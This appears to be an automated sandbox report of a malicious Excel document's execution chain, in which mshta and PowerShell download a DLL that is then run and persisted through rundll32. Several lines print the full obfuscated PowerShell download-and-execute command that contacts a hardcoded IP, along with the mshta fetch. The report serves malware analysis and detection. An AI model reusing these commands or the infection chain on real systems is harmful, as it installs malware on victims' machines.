                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: 3DBB.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_033A00C0 push 8B4902BAh; iretd 4_3_033A00C6
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_033A08C7 push 8B4902BAh; iretd 4_3_033A08CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034114C push ds; ret 9_2_0034114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003415F5 push cs; retf 9_2_003415FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0042114C push ds; ret 10_2_0042114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004215F5 push cs; retf 10_2_004215FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0047114C push ds; ret 11_2_0047114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004715F5 push cs; retf 11_2_004715FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026114C push ds; ret 12_2_0026114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002615F5 push cs; retf 12_2_002615FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033114C push ds; ret 14_2_0033114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003315F5 push cs; retf 14_2_003315FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: QWER.dll.6.drStatic PE information: real checksum: 0x8f55d should be: 0x909dc
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda (copy)Jump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jdywrgg\axwj.zob:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exe TID: 308Thread sleep time: -300000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_9-32031
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-32031
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: rundll32.exe, 0000000F.00000002.613710689.000000000078A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035D374 mov eax, dword ptr fs:[00000030h]9_2_0035D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0043D374 mov eax, dword ptr fs:[00000030h]10_2_0043D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0048D374 mov eax, dword ptr fs:[00000030h]11_2_0048D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027D374 mov eax, dword ptr fs:[00000030h]12_2_0027D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034D374 mov eax, dword ptr fs:[00000030h]14_2_0034D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADDJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADDJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiAJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtKJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServerJump to behavior
